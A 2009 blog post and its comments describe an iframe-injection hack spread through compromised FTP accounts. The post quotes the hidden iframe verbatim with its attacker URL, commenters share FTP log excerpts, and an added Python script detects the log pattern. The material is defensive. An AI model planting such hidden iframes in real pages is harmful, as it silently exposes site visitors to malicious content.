http://x-betstarwager-x.cn/in.cgi?cocacola87 - iframe wreaking havoc

By Eric · Friday, March 6th, 2009

A new hack/virus/trojan/malware/whatever is hitting sites across the net quickly.

Not sure what it exactly does, and don’t really care. :) All I know is it is a PITA (pain in the a..)

Basically what appears to be happening is the hack is gaining access via FTP to the root directory of web servers and modifying the index.php file to include the following iframe:

<iframe src="http://x-betstarwager-x.cn/in.cgi?cocacola87" width=1 height=1 style="visibility: hidden"></iframe>

Feel free to post a response if you know anything more about this. My knowledge is limited on it, but I know it’s hitting a lot of sites and just started in the very recent past.

In the meantime, if you have FTP access to your own web sites I would recommend a thorough scan of your own PC because it is possible the trojan is gaining access through your connection.


Comments

just spotted this on a client site. :(

looks like an FTP “attack”, here are entries from my log files (changed username):

202.160.120.90 USERACCOUNT [05/Mar/2009:11:09:00 +0000] "RETR index.html" 226 218
202.160.120.90 USERACCOUNT [05/Mar/2009:11:09:04 +0000] "STOR index.html" 226 326
202.160.120.90 USERACCOUNT [05/Mar/2009:11:09:19 +0000] "RETR index.php" 226 3900
202.160.120.90 USERACCOUNT [05/Mar/2009:11:09:23 +0000] "STOR index.php" 226 4008
202.160.120.90 USERACCOUNT [05/Mar/2009:11:09:31 +0000] "RETR index.php" 226 7101
202.160.120.90 USERACCOUNT [05/Mar/2009:11:09:35 +0000] "STOR index.php" 226 7209
202.160.120.90 USERACCOUNT [05/Mar/2009:11:10:14 +0000] "RETR index.php" 226 3495
202.160.120.90 USERACCOUNT [05/Mar/2009:11:10:17 +0000] "STOR index.php" 226 3629

I’m grepping my entire web directory just to be safe.

I’ve seen similar attacks. Looks like compromised FTP account access, with a script that finds index.html/php/etc files and updates them with the iframe.
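
The download-then-re-upload pattern visible in the log excerpt above can be turned into a check over FTP transfer logs. This is an added example, not from the original post or its commenters: the line layout is assumed from that excerpt, and the index-file pattern, the 30-second window, the 512-byte growth limit and the sample lines are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Line layout assumed from the log excerpt quoted in the comments above.
LINE_RE = re.compile(
    r'^(\S+) (\S+) \[([^\]]+)\] "(RETR|STOR) ([^"]+)" (\d{3}) (\d+)$')
# Assumption: which file names count as landing pages worth watching.
INDEX_RE = re.compile(r'(^|/)(index|default|home)\.(php|html?|asp)$', re.I)

def parse(line):
    # Undo the typographic quotes blog software puts into pasted logs.
    line = line.strip().translate({0x201C: '"', 0x201D: '"', 0x2033: '"'})
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, user, ts, verb, path, code, size = m.groups()
    ts = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, user, ts, verb, path, code, int(size)

def find_rewrites(lines, window=timedelta(seconds=30), max_growth=512):
    """Return (ip, user, path, growth) for each index page that was downloaded
    and then re-uploaded slightly larger by the same client within `window`."""
    pending = {}  # (ip, user, path) -> (time, size) of last successful RETR
    hits = []
    for ip, user, ts, verb, path, code, size in filter(None, map(parse, lines)):
        if code != "226" or not INDEX_RE.search(path):
            continue
        key = (ip, user, path)
        if verb == "RETR":
            pending[key] = (ts, size)
            continue
        prev = pending.pop(key, None)
        if prev and ts - prev[0] <= window and 0 < size - prev[1] <= max_growth:
            hits.append((ip, user, path, size - prev[1]))
    return hits

# Constructed sample log: documentation addresses, hypothetical account name.
SAMPLE = [
    '203.0.113.7 siteuser [05/Mar/2009:11:09:00 +0000] "RETR index.html" 226 2150',
    '203.0.113.7 siteuser [05/Mar/2009:11:09:04 +0000] "STOR index.html" 226 2258',
    '203.0.113.7 siteuser [05/Mar/2009:11:09:19 +0000] “RETR blog/index.php” 226 5120',
    '203.0.113.7 siteuser [05/Mar/2009:11:09:23 +0000] “STOR blog/index.php” 226 5228',
    '198.51.100.20 siteuser [05/Mar/2009:14:00:00 +0000] "RETR index.php" 226 3900',
    '198.51.100.20 siteuser [05/Mar/2009:14:25:00 +0000] "STOR index.php" 226 5200',
]

if __name__ == "__main__":
    for hit in find_rewrites(SAMPLE):
        print("possible injection: %s %s %s (+%d bytes)" % hit)
```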

 
